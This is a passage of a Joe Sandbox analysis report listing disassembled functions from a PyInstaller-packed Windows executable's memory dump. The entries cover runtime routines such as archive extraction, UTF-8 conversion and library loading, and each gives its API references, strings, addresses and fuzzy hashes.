Function 00007FF6477868A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6477868E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF647786CD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF647786F70

Strings

f, xrefs: 00007FF647786A09
-, xrefs: 00007FF64778697D
p, xrefs: 00007FF647786999
p, xrefs: 00007FF647786A11
:, xrefs: 00007FF647786AA0

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
Instruction ID: eac9462fa0efbf066602fd070886ee1b16f601fb0ef18af63d955fa33ae212e6
Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
Instruction Fuzzy Hash: B512E522E0C243E6FB20BB15D1946B97662FB40754FC64836EE89C76C6DF3DE5908B18

Function 00007FF6477715A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

malloc, xrefs: 00007FF647771640
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6477715D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF647771609
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6477716C2
fseek, xrefs: 00007FF647771610
fread, xrefs: 00007FF6477716C9
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF647771639

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: e5108cce18930c95ec008cab12b74f468bca2247a7531e4dfde3010c4de9cf3f
Instruction ID: 0098cb2bc65728989ddff275ecabbb4f4c6411225f8137bafbdaf2c2c14503a1
Opcode Fuzzy Hash: e5108cce18930c95ec008cab12b74f468bca2247a7531e4dfde3010c4de9cf3f
Instruction Fuzzy Hash: 8A319C61B0C642C6FA20BB11E4105BAA3A0FF547C8FD88432DE5DC7AA5EE3DF5458708

Function 00007FF64777EC00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF64777EC5D

Part of subcall function 00007FF64777FB70: __GetUnwindTryBlock.LIBCMT ref: 00007FF64777FBB3
Part of subcall function 00007FF64777FB70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF64777FBD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF64777ED35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF64777EF8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64777F096

Strings

csm, xrefs: 00007FF64777ECDE
csm, xrefs: 00007FF64777ED58
csm, xrefs: 00007FF64777EC77

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
Instruction ID: fb3b19abf260c39d3741d76d437e92e01dc4b9aadb5166a0e23c9495410de810
Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
Instruction Fuzzy Hash: 64E18C32A0CB41CAEB20BB3594402AD77A0FB45B88F944536EE8D97B95CF78F191C704

Function 00007FF6477787B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647778847
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF64777889E

Strings

WideCharToMultiByte, xrefs: 00007FF6477788E6
Failed to get UTF-8 buffer size., xrefs: 00007FF6477788DF
win32_utils_to_utf8, xrefs: 00007FF6477788D6
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6477788C6
Out of memory., xrefs: 00007FF6477788CF

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
Instruction ID: 69909ac49b06bbb8304eea58c049ff8cb033e3d65e2a959de34446c0b093647b
Opcode Fuzzy Hash: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
Instruction Fuzzy Hash: 2C416A32A0DB82C2E660FB15E84017AB7A1FB88790F944136DE9D87B94EF3CE555C708

Function 00007FF647778CF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF6477739EA), ref: 00007FF647778D31

Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0

WideCharToMultiByte.KERNEL32(?,00007FF6477739EA), ref: 00007FF647778DA5

Strings

WideCharToMultiByte, xrefs: 00007FF647778D45, 00007FF647778DB6
Failed to get UTF-8 buffer size., xrefs: 00007FF647778D3E
win32_utils_to_utf8, xrefs: 00007FF647778D72
Failed to encode wchar_t as UTF-8., xrefs: 00007FF647778DAF
Out of memory., xrefs: 00007FF647778D6B

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
Instruction ID: 68fa1ed17ea5b2493572fe1ac4ccf8a5a9480733054a1ec2dd3541dddbb37cfa
Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
Instruction Fuzzy Hash: BD216D71A0DB42D5EA10BB16E9800797661EB98B80F984536DE4D83794EF3CE5118348

Function 00007FF6477775B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF647777726

Part of subcall function 00007FF647780350: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647780364

Part of subcall function 00007FF647780324: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647780338

Strings

%s%c%s, xrefs: 00007FF6477775F5
ERROR: file already exists but should not: %s, xrefs: 00007FF64777768C
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF647777642
WARNING: file already exists but should not: %s, xrefs: 00007FF6477776A8
\, xrefs: 00007FF6477775FC

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: 683f7c82ee051074cc98c03ba619693d069a064928b9b5f33fff0d752aabab01
Instruction ID: 8bfd4056a062da357d29fe61e1ca6866c5d80c7df3cb5fb0466ef86b11323332
Opcode Fuzzy Hash: 683f7c82ee051074cc98c03ba619693d069a064928b9b5f33fff0d752aabab01
Instruction Fuzzy Hash: 5351AE61A0D643C5FA60BB25E9412B96299DF85BC4FD84531EE0DCB7DAEE6CF40083D8

Function 00007FF64777DEB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DF3D
GetLastError.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DF4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DF75
FreeLibrary.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DFBB
GetProcAddress.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DFC7

Strings

api-ms-, xrefs: 00007FF64777DF5D

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
Instruction ID: 870770a4ec577a68dbb1e8cb0a4c5119b0ad5b221eee9116bd8aa9ed956c3465
Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
Instruction Fuzzy Hash: 6F31C421A1EB42D5FE11BB02A8005792394FF48BA4F9A4936DD2DDB798DF3CF4558318

Function 00007FF647777430 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6477779B1,00000000,?,00000000,00000000,?,00007FF64777154F), ref: 00007FF64777748F

Part of subcall function 00007FF647772B30: MessageBoxW.USER32 ref: 00007FF647772C05

Strings

LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6477774A3
LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF647777466
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6477774EA

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
Instruction ID: 2cb88a090720b34a43a1b905860f8ee4d86d51261d8ab07e9f076ddd66ad8c63
Opcode Fuzzy Hash: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
Instruction Fuzzy Hash: D131C451B1D782C1FA20BB25E9563BA5295EF987C0FC44432DE4EC67A6FE2CF1048748

Function 00007FF647778BE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778CA0

Strings

MultiByteToWideChar, xrefs: 00007FF647778C2E, 00007FF647778CB1
Failed to get wchar_t buffer size., xrefs: 00007FF647778C27
Failed to decode wchar_t from UTF-8, xrefs: 00007FF647778CAA
Out of memory., xrefs: 00007FF647778C62
win32_utils_from_utf8, xrefs: 00007FF647778C69

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
Instruction ID: ccccf3c99b99a7c51e135570c727594b1777c9cb4cc2d9649b2ac84be263fb35
Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
Instruction Fuzzy Hash: EF217E62B0DA42C1EB50FB29F941069A3A1FB987C4F984135DF5CD3BA9EE2CE5418708

Function 00007FF64778B810 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64778B81F
FlsGetValue.KERNEL32 ref: 00007FF64778B834
FlsSetValue.KERNEL32 ref: 00007FF64778B855
FlsSetValue.KERNEL32 ref: 00007FF64778B882
FlsSetValue.KERNEL32 ref: 00007FF64778B893
FlsSetValue.KERNEL32 ref: 00007FF64778B8A4
SetLastError.KERNEL32 ref: 00007FF64778B8BF

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 314b1dd63a8d17b6b9fe49a3dc008a2d89e42ef813efa06f0dff02a3ee6b6398
Instruction ID: 6aaf654db9f71a66757f6bfcd9d0e505c79b474684c57e11098f5748c7d05c39
Opcode Fuzzy Hash: 314b1dd63a8d17b6b9fe49a3dc008a2d89e42ef813efa06f0dff02a3ee6b6398
Instruction Fuzzy Hash: 31215B20F0C242C2FA687371DA5617962425F447B0FD64738DD3EC66E6DE6CA401434A

Function 00007FF6477986BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6477986ED
GetLastError.KERNEL32 ref: 00007FF6477986F9
CloseHandle.KERNEL32 ref: 00007FF647798711
CreateFileW.KERNEL32 ref: 00007FF64779873C
WriteConsoleW.KERNEL32 ref: 00007FF64779875B

Strings

CONOUT$, xrefs: 00007FF64779871D

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
Instruction ID: 9a1f0133f288e4484b8432d50cd8713d8e3837566a8d52f58f9cec86c04fb804
Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
Instruction Fuzzy Hash: 6D118161A1CB41C6F750BB56E85472962A0FB98FE4F844234DE1DC77A4CF7CD8448748

Function 00007FF64777D878 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64777D8A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF64777D938
RtlUnwindEx.KERNEL32 ref: 00007FF64777D987

Strings

csm, xrefs: 00007FF64777D91E
f, xrefs: 00007FF64777D8B6

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
Instruction ID: ce294d502bd7196732f3973a87bee7a6d9917f19c9420ab95b7dea37d1113912
Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
Instruction Fuzzy Hash: 47517F32A1D602CAEB14BB15E404A7937A5FB80B98F91C532DE4A97748EF38F941C708

Function 00007FF647772600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF6477727EF), ref: 00007FF647772638
DialogBoxIndirectParamW.USER32 ref: 00007FF6477726FC
DeleteObject.GDI32 ref: 00007FF64777272F
DestroyIcon.USER32 ref: 00007FF647772741

Strings

Unhandled exception in script, xrefs: 00007FF647772668

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
Instruction ID: 97fb6b9b0423a835b016c7e0353e9c46e3296dd6abca2cffa33a4d0a73ea15c6
Opcode Fuzzy Hash: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
Instruction Fuzzy Hash: 11312C72A1DA82C9EB20FB65E9551F96360FF88B84F800135EE4D8BA69DF3CD105C744

Function 00007FF6477729E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14

Part of subcall function 00007FF647778570: GetLastError.KERNEL32(00000000,00007FF647772A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647778597
Part of subcall function 00007FF647778570: FormatMessageW.KERNEL32 ref: 00007FF6477785C6

Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

MessageBoxW.USER32 ref: 00007FF647772AF0
MessageBoxA.USER32 ref: 00007FF647772B0C

Strings

%s%s: %s, xrefs: 00007FF647772A6B
Fatal error detected, xrefs: 00007FF647772AC6, 00007FF647772AFE

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
Instruction ID: fe583392fee345c8133f6fa404efd6fa49ec3fbf1d4dd5d83e4e29a8e7bebf98
Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
Instruction Fuzzy Hash: EB311E7262CA82D1E630BB10E4516EA6364FB957C4F804136EA8D92AA9DF3CE605CB44

Function 00007FF64778A118 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF64778A13D
GetProcAddress.KERNEL32 ref: 00007FF64778A153
FreeLibrary.KERNEL32 ref: 00007FF64778A17A

Strings

mscoree.dll, xrefs: 00007FF64778A134
CorExitProcess, xrefs: 00007FF64778A14C

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
